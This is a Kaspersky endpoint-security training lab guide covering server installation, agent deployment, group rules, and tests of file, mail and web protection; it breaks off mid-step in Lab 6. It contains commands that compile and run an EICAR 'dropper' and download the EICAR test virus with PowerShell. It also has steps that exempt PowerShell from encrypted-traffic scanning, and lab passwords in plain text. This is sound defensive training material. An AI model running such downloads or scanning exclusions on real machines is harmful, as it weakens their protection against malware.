KL 002.11.1 en Labs v2.1.5 PDF


Kaspersky Technical Training

KL 002.11.1

Kaspersky Endpoint Security and Management

Lab Guide
Kaspersky Lab
www.kaspersky.com
Table of contents
Lab 1. How to install Kaspersky Security Center ......................................................................................................... 3
Task A: Install the Kaspersky Security Center Administration Server ................................................................... 3
Task B: Install the Web console of Kaspersky Security Center .............................................................................. 7
Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server ........ 10
Lab 2. How to deploy Kaspersky Endpoint Security .................................................................................................. 17
Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server ........ 18
Task B: Create a standalone installation package for Kaspersky Endpoint Security .......................................... 22
Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook .................. 24
Task D: Study the results of deploying protection in the network ........................................................................ 25
Lab 3. How to create a structure for the managed computers ..................................................................................... 26
Task A: Create groups for workstations, notebooks, and servers ........................................................................ 26
Task B: Move computers into groups by rules ..................................................................................................... 28
Lab 4. How to test File Threat Protection ................................................................................................................... 34
Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux ........ 34
Lab 5. How to configure Mail Threat Protection ........................................................................................................ 36
Task A: Send a message with an executable file .................................................................................................. 36
Task B: Edit the attachment filter ........................................................................................................................ 37
Task C: Make sure that Mail Threat Protection does not edit attachments anymore .......................................... 39
Lab 6. How to test Web Threat Protection.................................................................................................................. 41
Task A: Make sure that Web Threat Protection scans https traffic by default ..................................................... 41
Task B: Turn off encrypted traffic scanning for the PowerShell application ....................................................... 41
Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https ........ 43
Lab 7. How to test protection of network folders against ransomware ....................................................................... 44
Task A: Simulate a ransomware infection ............................................................................................................ 44
Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine ............................ 48
Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices 49
Task D: Make sure that exclusions for trusted network devices work correctly .................................................. 50
Lab 8. How to check health of Exploit Prevention ..................................................................................................... 51
Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer ........ 51
Task B: Disable most of the protection components ............................................................................................ 54
Task C: Test protection against exploits .............................................................................................................. 55
Lab 9. How to test protection against fileless threats .................................................................................................. 56
Make sure that AMSI detects fileless threats........................................................................................................ 57
Lab 10. Improve workstations’ protection against ransomware ................................................................................. 58
Task A: Simulate a ransomware infection ............................................................................................................ 58
Task B: Prohibit all programs except for trusted from editing and deleting documents ..................................... 59
Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server ........................ 63
Task D: Simulate encrypting a document and check the result ............................................................................ 66
Lab 11. How to test Network Threat Protection ......................................................................................................... 67
Task A: Imitate a network attack from Kali on Alex-Desktop .............................................................................. 67
Task B: Study the Network attack report ............................................................................................................. 68
Task C: Unblock the Kali computer ..................................................................................................................... 71
Task D: Configure exclusions in the properties of Network Threat Protection ................................................... 73
Task E: Imitate an attack from Kali on Alex-Desktop and study the results ........................................................ 74
L–2 KASPERSKY LAB™
KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1

Lab 12. How to configure exclusions from self-defense ............................................................................................. 75


Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance ............................... 75
Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security ................................. 79
Task C: Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session ......... 80
Lab 13. How to configure password protection .......................................................................................................... 81
Task A: Find a computer where protection is off ................................................................................................. 81
Task B: Protect Kaspersky Endpoint Security with a password ........................................................................... 82
Task C: Make sure that Kaspersky Endpoint Security is password-protected ..................................................... 85
Task D: Set a password for Network Agent uninstallation................................................................................... 86
Lab 14. How to configure Application Control .......................................................................................................... 88
Task A: Create a category for all web browsers except Internet Explorer .......................................................... 89
Task B: Prohibit the users from starting any browsers except for Internet Explorer........................................... 91
Task C: Start Mozilla Firefox and Internet Explorer ........................................................................................... 93
Lab 15. How to block start of unknown applications in the network .......................................................................... 95
Task A: Create an application category that prohibits starting unknown files .................................................... 95
Task B: Change the policy so as to prohibit all users from starting unknown files ............................................. 98
Task C: Make sure that the settings work correctly ........................................................................................... 100
Lab 16. How to block USB flash drives.................................................................................................................... 102
Task A: Configure blocking USB flash drives .................................................................................................... 102
Task B: Test blocking USB flash drives ............................................................................................................. 105
Task C: Receive a request from the user ............................................................................................................ 106
Lab 17. How to configure granular permissions for USB flash drives ..................................................................... 107
Task A: Prohibit all users from writing files to USB flash drives ...................................................................... 107
Task B: Allow domain users to write files to trusted USB flash drives .............................................................. 110
Lab 18. How to configure web access control .......................................................................................................... 115
Task A: Create a rule to block access to cryptocurrency exchange websites..................................................... 116
Task B: Test whether access to cryptocurrency exchange websites is blocked .................................................. 119
Task C: Consult reports in Kaspersky Security Center ...................................................................................... 120
Lab 19. How to configure Adaptive Anomaly Control ............................................................................................. 121
Task A: Configure blocking macros and scripts in office documents ................................................................. 121
Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro ................................................. 123
Task C: Configure Exploit Prevention to block malicious macros .................................................................... 125
Lab 20. How to configure the dashboard .................................................................................................................. 129
Task A: Add new widgets to the dashboard ........................................................................................................ 130
Task B: Delete and rearrange widgets ............................................................................................................... 132
Lab 21. How to configure maintenance tools............................................................................................................ 134
Task A: Delete unnecessary reports ................................................................................................................... 134
Task B: Create a weekly report about infected computers ................................................................................. 135
Task C: Configure the most important reports to be emailed ............................................................................ 137
Lab 22. How to collect diagnostic information ......................................................................................................... 140
Task A: Collect trace logs from a computer ....................................................................................................... 140

Lab 1.
How to install Kaspersky Security Center
Scenario. You need to protect less than 100 computers at ABC Inc. with Kaspersky Endpoint Security for Business. One
Administration Server and the Express edition of Microsoft SQL Server are enough for managing protection within such a
network. Install Kaspersky Security Center Administration Server on a dedicated computer running Windows Server 2016.
Microsoft SQL server has been installed on the virtual machine beforehand.
Contents. In this lab, we will:

1. Install the Kaspersky Security Center Administration Server
2. Install the Web console of Kaspersky Security Center
3. Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server
Task A: Install the Kaspersky Security Center Administration Server

Install Kaspersky Security Center Administration Server with the default settings.

The task is performed on Security-Center.
The DC computer must be turned on.

1. Start the Kaspersky Security Center installer (it is on the desktop)
2. On the welcome page of the wizard, click Next
3. On the following page, make sure that the required version of .NET Framework is installed and click Next

4. Accept the License Agreement and the Privacy Policy
5. Click Next
6. Select the Standard installation type and click Next
7. Clear the checkbox Install Kaspersky Security Center 11 Web Console. We will install the web console later using its own installation wizard

8. Keep the option Fewer than 100 networked devices selected and click Next
9. Select Microsoft SQL Server and click Next
10. Click Browse

11. Select the SECURITY-CENTER\SQLEXPRESS server and click OK
12. To proceed with the installation of Kaspersky Security Center, click Next
13. Select Microsoft Windows Authentication Mode and click Next

14. To start the installation, click Install
15. Do not select to start the Administration Console and click Finish to close the wizard

Task B: Install the Web console of Kaspersky Security Center

Kaspersky Security Center 11 features a new management Web Console. It is implemented as an independent component that
has a separate distribution.

The task is performed on Security-Center.
The DC computer must be turned on.

16. Start the Kaspersky Security Center Web Console installer (ask the instructor where the distribution is located)
17. Select a language for the installation wizard

18. On the welcome page of the wizard, click Next
19. Accept the License Agreement and click Next
20. Do not change the destination folder
21. Click Next
22. Specify the connection address: 127.0.0.1
23. Do not change the port
24. Click Test

25. Make sure that port 8080 is accessible at 127.0.0.1
26. Click OK and Next
27. Leave these settings unchanged
28. Click Next
29. Select the option Generate new certificate
30. Click Next
31. Make sure that SECURITY-CENTER is specified in the list of trusted Administration Servers
32. Click Next to proceed with the installation

33. To start the installation, click Install
34. Close the Kaspersky Security Center 11 Web Console Setup Wizard: Click Finish

Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server

Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the Quick Start
Wizard. Add an activation code. Configure notifications to [email protected] via SMTP server 10.28.0.10. Accept the
KSN agreement. Download signature updates. Do not start the Remote Installation Wizard. Enable automatic distribution for
the license.

The task is performed on Security-Center.
The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

35. Start the Google Chrome browser. In the address bar, type https://127.0.0.1:8080
36. Click Advanced
37. Click the link Proceed to 127.0.0.1 (unsafe)
38. Enter the username abc\administrator and password Ka5per5Ky
39. Click the Login button
40. Skip the tutorial. Click X to close it

41. On the welcome page of the wizard, click Next
42. We will not use a proxy server. Click Next
43. Do not wait for the wizard to download updates, click Next

44. To activate the application, select Add activation code
45. Ask the trainer where to find the activation code
46. Enter the activation code in the field
47. Click Send
48. Make sure that 3 keys have been added to the repository
49. Click Next
50. Click Add to install the management plugin of Kaspersky Endpoint Security 11.1

51. Select the English KSC Web Console Plug-in for KES Windows
52. Click Install Plug-in
53. Make sure that the plugin of Kaspersky Endpoint Security 11.1 has been successfully added to the list
54. Click OK

55. Click Next
56. Accept the KSN statement: Select I agree to use Kaspersky Security Network and click Next
57. Click Create
58. Wait for the Quick Start Wizard to create the default policies and tasks

59. If the Network poll page appears, click Next
60. Specify the addressee for email notifications: In the Email address box, enter [email protected], and for the SMTP server, type 10.28.0.10
61. Click the button Send test message to check whether the settings are correct
62. Make sure that there is no error message and click Next
63. Clear the Start Protection Deployment Wizard check box and click Finish

64. Switch to Operations | Licensing
65. Select the key for workstations and servers
66. Click the license name to open the key properties
67. Select to Deploy key automatically
68. Click Save

Conclusion

You installed the Administration Server, Kaspersky Security Center Web Console, and plugin for Kaspersky Endpoint
Security. Also, you completed the Quick Start Wizard: Created the default tasks and policies, accepted the KSN agreement,
configured notifications for the administrator, and enabled autodistribution for the key.

Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent.

Lab 2.
How to deploy Kaspersky Endpoint Security
Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have installed the Kaspersky
Security Center Administration Server already. Now, use the Remote Installation Wizard to install Kaspersky Endpoint
Security and Network Agent on the computers discovered by the Administration Server.
Contents. In this lab, we will:
1. Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration
Server
2. Install Kaspersky Endpoint Security for Windows using a standalone package on a notebook
3. Study the installation results

Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server

Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access the computers,
specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the other settings unchanged.

Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it.

The task is performed on Security-Center.
The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Switch to Discovery & Deployment
2. On the Deployment & Assignment drop-down menu, select Protection Deployment Wizard
3. Select Kaspersky Endpoint Security for Windows (11.0.0) in the list of installation packages
4. Click Next
5. Select Do not add key to installation package
6. Click Next
7. Select Kaspersky Security Center 11 Network Agent
8. Click Next

9. Choose Select devices for installation
10. Expand the Managed devices list. Find and select the Security Center computer
11. Expand the Unassigned devices list. Find and select the Alex-Desktop computer
12. Without changing the package copying parameters, click Next
13. Click Next without changing the restart parameters

14. Agree to uninstall incompatible applications and click Next
15. Select to move computers to the Managed devices group after the installation and click Next
16. To specify the name and password of an administrator, select Account required (installation without Network Agent)
17. To specify an account, click Add
18. Type the abc\administrator username, Ka5per5Ky password, and click OK
19. Make sure that the abc\administrator account has been added and click Next

20. Select the check box Run the task when the Wizard completes
21. Click OK
22. Open the Devices | Tasks tab
23. Select the Remote installation of Kaspersky Endpoint Security for Windows task
24. To consult its progress, click Result
25. Make sure that the task is running on two computers
26. Wait for the notification that the computers have to be restarted to complete the task successfully
27. Switch to Alex-Desktop
28. Log on to the abc\Alex account, password Ka5per5Ky
29. Restart the computer: Click the Restart button in the message window
30. After it boots, log on to the abc\Alex account with the password Ka5per5Ky

31. To complete the Kaspersky Endpoint Security installation on the Security-Center server, restart the machine.
32. When the computer starts again, log on to the abc\Administrator account with the password Ka5per5Ky

Task B: Create a standalone installation package for Kaspersky Endpoint Security

Open the list of installation packages. Select the Kaspersky Endpoint Security package. Start the standalone package creation wizard. Add the Network Agent to the installation package and select the group into which the target computers are to be moved after the installation.

The task is performed on Security-Center.
The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

33. Log on to the abc\Administrator account with the password Ka5per5Ky
34. Run the MMC Administration Console
35. Expand the Advanced | Remote installation node
36. Select the Installation packages node
37. Select the installation package Kaspersky Endpoint Security for Windows (11.1.0)
38. In the right pane, click the link Create stand-alone installation package

39. Agree to install Kaspersky Security Center 11 Network Agent together with Kaspersky Endpoint Security: Click Next
40. Agree to move protected computers to the Managed devices group: Click Next
41. Wait for the wizard to create the package
42. Pay attention to the package file path, you will need it in the next task. Click Next

43. Click Finish to close the wizard

Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook

From the client computer, open the KLSHARE folder on the Administration Server. Find and run the standalone package.

The task is performed on Tom-Laptop.
The DC, Security-Center, and Alex-Desktop machines must be powered on.

44. On the Tom-Laptop machine, start Windows Explorer
45. Open the shared folder \\security-center\klshare\PkgInst\
46. Open the folder of the standalone package that you created in the first task
47. Copy the installer.exe file to the desktop and start it
48. In the User Account Control window, confirm running the file with administrative privileges: Click Yes

49. Start the installation: Click the respective button
50. Wait for the installation to complete and click Close to exit the results window

Task D: Study the results of deploying protection in the network

Study the results of the installation task. Make sure that the computers have been moved to the Managed devices group. Make
sure that Network Agent 11 and Kaspersky Endpoint Security 11.1 are installed on the computers.

The task is performed on Security-Center.
The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

51. Open Kaspersky Security Center Web Console
52. Switch to the Monitoring & Reporting | Reports tab
53. Find the Deployment reports
54. Select the Kaspersky Lab software version report
55. Click Show report

56. Make sure that it displays three instances of Kaspersky Endpoint Security and three instances of Network Agent, exactly the same number as there are network computers
57. Close the report

Conclusion

You have installed Kaspersky Endpoint Security and Network Agent using the remote installation wizard and a standalone
package.

If an antivirus by another manufacturer is installed on a computer, the installer will uninstall it and prompt to restart the
machine.

If a firewall is running on a computer or you haven’t specified an account that has administrative permissions on the target
machines, the installation will return an error.

Lab 3.
How to create a structure for the managed computers
Scenario. You have installed protection on the network computers and you want to configure it optimally. Assuming that
servers, desktops, and laptops need different settings, create respective groups for them and move the computers there. To save
effort in hand-moving the computers into their appropriate groups, create relocation rules and configure conditions based on
the operating systems and network parameters of the computers.

Contents. In this lab, we will:

1. Create groups for workstations, notebooks, and servers
2. Move computers into the groups using rules

Task A: Create groups for workstations, notebooks, and servers

Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops and Laptops
subgroups within the Workstations group.

The task is performed on Security-Center.
The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

1. Open the Devices | Edit groups tab
2. Select the group Managed devices
3. To create a subgroup, click Add
4. Type Servers for the group name and click Add
5. Select the Managed devices group
6. To create a subgroup, click Add
7. Create another subgroup named Workstations

8. Select the Workstations group and click Add
9. Type Desktops for the group name
10. Repeat steps 8 and 9 to create the Laptops group

Task B: Move computers into groups by rules

Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers. It will work
permanently and move servers to the Servers group. Use the Network agent is running condition and the Operating system
version condition with the Windows Server 2012 R2 and Windows Server 2016 values. You can find both conditions on the
Applications tab.

Create similar rules that will move computers to the Desktops and Laptops groups respectively. Instead of the Operating
system version, use the IP Range condition available on the Network tab. For desktop computers, specify range 10.28.0.100–
10.28.0.199; and for notebooks, 10.28.0.200–10.28.0.254.

The task is performed on Security-Center.
The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

11. Switch to Discovery & Deployment
12. On the Deployment & Assignment drop-down menu, select Moving rules
13. Click Add
14. Type Servers for the rule name
15. Specify the destination group: On the drop-down list, select the Managed devices | Servers subgroup
16. Select the Rule applied continuously option
17. To apply the rule to all computers, clear the checkbox Move only devices that do not belong to an administration group
18. Select the Enable rule check box

19. Open the Rule conditions tab
20. Switch to the Applications tab
21. Specify that the Network Agent is installed: On the respective drop-down list, select Yes
22. Apply the rule to computers with server operating systems: Enable the Operating system version parameter
23. Scroll the list to the bottom and switch to the second page
24. Under Operating system version, select Microsoft Windows 2012 R2 and Microsoft Windows Server 2016
25. To save the rule, click Save
26. Click Add to create a rule for desktops

27. Type Desktops for the rule name
28. Specify the destination group: On the drop-down list, select the Managed devices | Workstations | Desktops subgroup
29. Select the Rule applied continuously option
30. To apply the rule to all computers, clear the checkbox Move only devices that do not belong to an administration group
31. Select the Enable rule check box
32. Open the Rule conditions tab
33. Configure conditions for IP addresses: Switch to the Network tab
34. Apply the rule to the computers whose addresses belong to a specific interval: Select the IP range check box
35. Specify IP range 10.28.0.100–10.28.0.199
36. Switch to the Applications tab
37. Specify that the Network Agent is installed: On the respective drop-down list, select Yes
38. To save the rule, click Save
39. Click Add to create a rule for notebooks
40. Type Laptops for the rule name
41. Specify the destination group: On the drop-down list, select the Managed devices | Workstations | Laptops subgroup
42. Select the Rule applied continuously option
43. Clear the check box Move only devices that do not belong to an administration group
44. Select the Enable rule check box
45. Open the Rule conditions tab
46. Switch to the Network tab
47. Select the IP range check box
48. Specify IP range 10.28.0.200–10.28.0.254
49. Switch to the Applications tab
50. Specify that the Network Agent is installed: On the respective drop-down list, select Yes
51. To save the rule, click Save
52. Make sure that there are five relocation rules in the list: Two have been created automatically for installation packages, and three by you
53. Click Devices | Managed devices
54. Click Devices | Groups
55. (Optional) Pin the group structure
56. On the group structure tree, expand Security Center | Managed devices and select Servers
57. Open the properties of the Security-Center device
58. Make sure that the Security-Center computer, which is running the Windows Server 2016 operating system, has been automatically moved to the Servers group
59. In a similar manner, make sure that the other computers have been moved to their respective groups
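The three moving rules above can be checked offline before the Enable rule box is ticked. The Python model below is an added example, not Kaspersky Security Center code: it reproduces the conditions entered in steps 14 to 51 (Network Agent installed, Operating system version, IP range, the Move only devices option) and assumes that rules are evaluated top-down with the first match winning; the device inventory is constructed, and only the Security-Center operating system, the Alex-Desktop address 10.28.0.100 and the Kali address 10.28.0.50 come from the lab.

```python
"""Model of the three moving rules created in Lab 3 (Servers, Desktops, Laptops).

Added example, not Kaspersky Security Center code. Rules are assumed to be
evaluated top-down with the first match winning; every other option mirrors a
control in the Moving rules dialog.
"""
from dataclasses import dataclass, field
from typing import FrozenSet, Optional, Tuple
import ipaddress


@dataclass
class Device:
    name: str
    ip: str
    os: str
    network_agent: bool          # Applications tab: Network Agent installed
    group: Optional[str] = None  # current administration group, None if unassigned


@dataclass
class MovingRule:
    name: str
    destination: str               # destination group chosen on the drop-down list
    enabled: bool = True           # Enable rule check box
    only_unassigned: bool = False  # Move only devices that do not belong to an administration group
    require_agent: bool = True     # Network Agent installed: Yes
    os_versions: FrozenSet[str] = field(default_factory=frozenset)  # empty = any OS
    ip_range: Optional[Tuple[str, str]] = None  # Network tab: IP range, inclusive

    def matches(self, device: Device) -> bool:
        if not self.enabled:
            return False
        if self.only_unassigned and device.group is not None:
            return False
        if self.require_agent and not device.network_agent:
            return False
        if self.os_versions and device.os not in self.os_versions:
            return False
        if self.ip_range is not None:
            low, high = (ipaddress.ip_address(a) for a in self.ip_range)
            if not low <= ipaddress.ip_address(device.ip) <= high:
                return False
        return True


# The three rules as the lab configures them (steps 14 to 51).
LAB3_RULES = [
    MovingRule("Servers", "Managed devices | Servers",
               os_versions=frozenset({"Microsoft Windows 2012 R2",
                                      "Microsoft Windows Server 2016"})),
    MovingRule("Desktops", "Managed devices | Workstations | Desktops",
               ip_range=("10.28.0.100", "10.28.0.199")),
    MovingRule("Laptops", "Managed devices | Workstations | Laptops",
               ip_range=("10.28.0.200", "10.28.0.254")),
]


def destination_for(device: Device, rules=LAB3_RULES) -> Optional[str]:
    """Group the device would be moved to, or None if no enabled rule matches."""
    for rule in rules:
        if rule.matches(device):
            return rule.destination
    return None


def apply_rules(devices, rules=LAB3_RULES) -> dict:
    """Map every device name to its destination group (None = stays where it is)."""
    return {d.name: destination_for(d, rules) for d in devices}


# Constructed inventory. Only the Security-Center OS, the Alex-Desktop address
# 10.28.0.100 and the Kali address 10.28.0.50 come from the lab; the rest is made up.
SAMPLE_DEVICES = [
    Device("Security-Center", "10.28.0.10", "Microsoft Windows Server 2016", True),
    Device("Alex-Desktop", "10.28.0.100", "Microsoft Windows 10", True),
    Device("Tom-Laptop", "10.28.0.200", "Microsoft Windows 10", True),
    Device("Kali", "10.28.0.50", "Kali Linux", False),        # no Network Agent: never moved
    Device("Printer-01", "10.28.0.150", "Embedded", False),   # in the desktop range, but no agent
]

if __name__ == "__main__":
    for name, group in apply_rules(SAMPLE_DEVICES).items():
        print(f"{name:16} -> {group}")
```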

Conclusion

You installed protection and organized the computers into groups. The default settings are optimized for an average user of
Kaspersky Endpoint Security. They reliably protect computers, and minimize the performance impact. You can adjust the
protection-comfort balance as necessary: Reinforce protection in some aspects, and maybe make concessions in some others
aiming to improve the user experience. Further labs will explain how to fine-tune the protection settings.

Lab 4.
How to test File Threat Protection
Scenario. You installed Kaspersky Endpoint Security on the network computers. By default, Kaspersky Endpoint Security
supports Windows Subsystem for Linux: It is a compatibility layer for running Linux applications in the latest versions of
Microsoft Windows. In our environment, Windows Subsystem for Linux is based on Ubuntu Linux 14.04. The administrator is
to start a test malicious file in Windows Subsystem for Linux and make sure that Kaspersky Endpoint Security 11.1 detects and
deletes it.

Contents. In this lab, we will:

1. Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux
2. Consult the File Threat Protection events

Make sure that Kaspersky Endpoint Security can detect malicious files that
run within Windows Subsystem for Linux

In this task, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running under
Windows 10.
The task is performed on Tom-Laptop.

The DC and Security-Center machines must be powered on.

1. Press WIN+R
2. Type wsl
3. Click OK
4. Copy the eicar dropper's source code to the /tmp folder:
cp /mnt/c/temp/eicar_drop_kl_edu.cpp /tmp/
5. Go to the /tmp directory:
cd /tmp/
6. Compile the eicar dropper using the g++ compiler:
g++ eicar_drop_kl_edu.cpp -o eicar_dropper
7. Run the compiled eicar dropper:
./eicar_dropper

8. Click the Kaspersky Endpoint Security icon in the notification area or on the Start menu to open the Kaspersky Endpoint Security interface
9. Click Reports in the lower-left corner
10. Select the File Threat Protection report
11. Find the threat detection event
12. Find the results of processing this threat

Conclusion

This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created within Windows
Subsystem for Linux.

Lab 5.
How to configure Mail Threat Protection
Scenario. Your network computers are protected with Kaspersky Endpoint Security. When an administrator emails an
executable file to a user who is to run it and thus solve an issue, Kaspersky Endpoint Security renames the attachment. To save
time and avoid explaining to users how to rename such files back, configure Mail Threat Protection not to rename them. At the
same time, criminals often use files with a double extension to trick users into running a malicious executable disguised as a
document.

Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files, but to rename files with the double
extension *.pdf.exe:

1. Send a message with an executable file
2. Edit the attachment filter
3. Make sure that Mail Threat Protection does not edit attachments anymore

Task A: Send a message with an executable file

Send a message to [email protected] with a zipped *.pdf.exe file attached. Receive the message and make sure that Mail Threat
Protection has changed the extension of the archived file.
The task is performed on Alex-Desktop.

The DC and Security-Center machines must be powered on.

1. Begin the task on Alex-Desktop.
2. Create a new message:
— Specify the addressee. In the To: field, type [email protected]
— In the Subject: box, type Weekly report
— Attach the Document1.zip file to the message (ask the trainer where it is located)
3. Click Send to dispatch the message

Switch to Tom-Laptop

4. Run Microsoft Outlook. Select the received message
5. Save the Document1.zip file to the desktop
6. Unpack the Document1.zip archive (select the Extract all command on the file's shortcut menu)
7. Note that the archived file is named Document1.pdf.ex_. Mail Threat Protection has changed the extension of the archived executable file

Task B: Edit the attachment filter

In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection deletes.
The task is performed on Security-Center.

The DC, Alex-Desktop, and Tom-Laptop machines must be powered on.

8. Open Kaspersky Security Center Web Console
9. Go to Devices | Policies & Profiles
10. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
11. Switch to the Application Settings tab
12. Open the Essential Threat Protection section
13. Open the Mail Threat Protection settings
14. Reconfigure attachment filtering. Choose Delete attachments of selected types
15. Scroll the list of settings down
16. Disable processing *.exe
17. Create a new attachment filter: Click Add
18. In the Extension field, type *.pdf.exe
19. Click OK
20. Make sure that the *.pdf.exe attachment filter is displayed in the list
21. Click OK
22. Click Save to save the policy
23. Wait for the policy to be enforced

Task C: Make sure that Mail Threat Protection does not edit attachments anymore
The task is performed on Alex-Desktop.

The DC, Security-Center, and Tom-Laptop machines must be powered on.

24. On the Alex-Desktop machine, create another message. Attach the Procmon.zip file (ask the instructor where this file is located)
25. In the Subject: box, type IT Service Desk
26. Click Send

Switch to Tom-Laptop

27. Open Microsoft Outlook
28. Save the Procmon.zip file to the desktop
29. Unpack the Procmon.zip archive (select the Extract all command on the file's shortcut menu)
30. Note that in the new message, the archived file is named Procmon.exe; Mail Threat Protection has not renamed it
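The filter behaviour exercised in Tasks A to C can be rehearsed before the policy is pushed. The Python model below is an added example, not Kaspersky code: it applies a constructed filter list in the state left after Task B (*.exe disabled, *.pdf.exe added) to attachment names, including the names inside a zip such as Document1.zip, and generalises the scenario's double-extension warning into a check; the rename convention (last character of the extension replaced by "_", as in Document1.pdf.ex_) is taken from Task A's result and assumed to hold for every pattern.

```python
"""Model of the Mail Threat Protection attachment filter configured in Lab 5.

Added example, not Kaspersky code. The filter list is constructed and much
shorter than the product's default list; the rename convention is inferred
from the Document1.pdf.ex_ result observed in Task A.
"""
import fnmatch
import io
import zipfile

# pattern -> enabled, as left after Task B. Constructed list.
LAB5_FILTERS = {
    "*.pdf.exe": True,   # added in step 18
    "*.exe": False,      # disabled in step 16, so Procmon.exe reaches the user unchanged
    "*.com": True,
    "*.scr": True,
}

# Used by the double-extension check below (assumption, not a product setting).
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
EXECUTABLE_EXTENSIONS = {"exe", "com", "scr", "bat", "cmd", "js", "vbs"}


def filtered_name(name: str, filters=LAB5_FILTERS) -> str:
    """Name the recipient sees: unchanged unless an enabled pattern matches,
    in which case the last character of the extension becomes '_'."""
    for pattern, enabled in filters.items():
        if enabled and fnmatch.fnmatchcase(name.lower(), pattern.lower()):
            return name[:-1] + "_"
    return name


def is_double_extension_lure(name: str) -> bool:
    """A document-looking extension immediately followed by an executable one
    (report.pdf.exe, invoice.docx.scr): the trick the scenario warns about."""
    parts = name.lower().split(".")
    return (len(parts) >= 3
            and parts[-2] in DOCUMENT_EXTENSIONS
            and parts[-1] in EXECUTABLE_EXTENSIONS)


def filter_zip(data: bytes, filters=LAB5_FILTERS) -> dict:
    """Apply the filter to every member of an in-memory zip archive.
    Returns {original member name: renamed name} for the members that changed."""
    renamed = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for member in archive.namelist():
            new_name = filtered_name(member, filters)
            if new_name != member:
                renamed[member] = new_name
    return renamed


def build_sample_zip(member_names) -> bytes:
    """Constructed test archive: the given names with harmless placeholder contents."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        for member in member_names:
            archive.writestr(member, b"placeholder bytes, not a real executable")
    return buffer.getvalue()


if __name__ == "__main__":
    # The two messages of Tasks A and C, replayed against the post-Task B filter list.
    for archive_name, members in (("Document1.zip", ["Document1.pdf.exe"]),
                                  ("Procmon.zip", ["Procmon.exe"])):
        print(archive_name, filter_zip(build_sample_zip(members)) or "unchanged")
```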

Conclusion

You have configured Mail Threat Protection not to rename .exe files.

If the network is being attacked through email by a new virus that has not yet been added to either the signature database or KSN,
configure Mail Threat Protection to rename or delete all executable attachments.
Lab 6.
How to test Web Threat Protection
Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the certificate for this
purpose, which sometimes may affect banking and other software that uses a certificate of its own. To avoid interaction issues,
Kaspersky Endpoint Security permits excluding encrypted traffic from scanning.

Contents. In this lab, we will:

1. Make sure that Web Threat Protection scans https traffic under the default settings
2. Turn off encrypted traffic scanning for the PowerShell application
3. Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https

Task A: Make sure that Web Threat Protection scans https traffic by default

Run PowerShell, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react.

The task is performed on Tom-Laptop.

The DC and Security-Center machines must be powered on.

1. Press WIN+R
2. Type powershell
3. Click OK

4. Download the eicar_com.zip file via PowerShell over https. Carry out the following command:
Invoke-WebRequest -uri "https://secure.eicar.org/eicar_com.zip" -OutFile "C:\temp\eicar_com.zip"

5. Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell window

Task B: Turn off encrypted traffic scanning for the PowerShell application

Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file, and check how Kaspersky Endpoint
Security will react.
The task is performed on Security-Center.

The DC and Tom-Laptop machines must be powered on.

6. Open Kaspersky Security Center Web Console
7. Go to Devices | Policies & Profiles
8. Open the policy Kaspersky Endpoint Security for Windows (11.1.0)
9. Switch to the Application Settings tab
10. Open the General Settings section
11. Open Exclusions
12. To add a trusted application, click the link Trusted applications in the lower-left corner of the window

13. Click Add
14. For the application path, type %systemroot%\system32\WindowsPowershell\v1.0\powershell.exe
15. Clear the following checkboxes:
— Do not scan opened files
— Do not inherit restrictions of the parent process (application)
16. Select Do not scan network traffic | Encrypted traffic only
17. Click OK three times to save the exclusion
18. Click Save to save the policy
19. Confirm that you want to use the specified settings: Click Yes
20. Wait for the policy to be enforced

Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https

Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again. Make sure
that Web Threat Protection will not block the test virus if it is downloaded via a trusted application.

The task is performed on Tom-Laptop.

The DC and Security-Center machines must be powered on.

21. Download eicar_com.zip over the https secure protocol one more time. Carry out the following command:
